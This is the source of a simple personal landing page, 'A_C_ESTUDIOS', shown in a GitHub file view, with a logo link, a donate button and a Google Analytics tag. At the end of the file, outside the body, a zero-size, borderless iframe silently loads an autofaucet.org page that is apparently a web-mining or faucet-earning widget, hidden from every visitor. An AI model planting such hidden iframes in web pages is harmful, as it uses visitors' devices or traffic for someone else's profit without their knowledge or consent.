-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
71 lines (70 loc) · 1.58 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<!DOCTYPE html>
<html>
<head>
<title>A_C_ESTUDIOS</title>
<style>
body {
background-color: black;
color: white;
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin: 0 auto;
max-width: 800px;
padding-top: 50px;
padding-bottom: 50px;
}
.logo {
display: block;
margin: 0 auto;
max-width: 400px;
padding-bottom: 50px;
}
.text {
font-size: 24px;
padding-top: 50px;
}
.btn-donate {
position: absolute;
top: 0;
right: 0;
margin: 10px;
padding: 10px 20px;
background-color: #fff;
color: #000;
border-radius: 5px;
text-decoration: none;
font-weight: bold;
font-size: 16px;
}
</style>
<!-- Google tag (gtag.js) -->
<script
async
src="https://www.googletagmanager.com/gtag/js?id=G-CZZR57E4KZ"
></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() {
dataLayer.push(arguments);
}
gtag("js", new Date());
gtag("config", "G-CZZR57E4KZ");
</script>
</head>
<body>
<a href="https://fdefake.github.io/Donar/" class="btn-donate">Donar</a>
<div class="container">
<a href="https://fdefake.github.io/VG-Adventures/">
<img src="Logo.jpg" alt="Logo" class="logo" />
</a>
</div>
</body>
<iframe
src="https://autofaucet.org/wm/JH51664JH/4"
width="0"
height="0"
style="border: 0"
></iframe>
</html>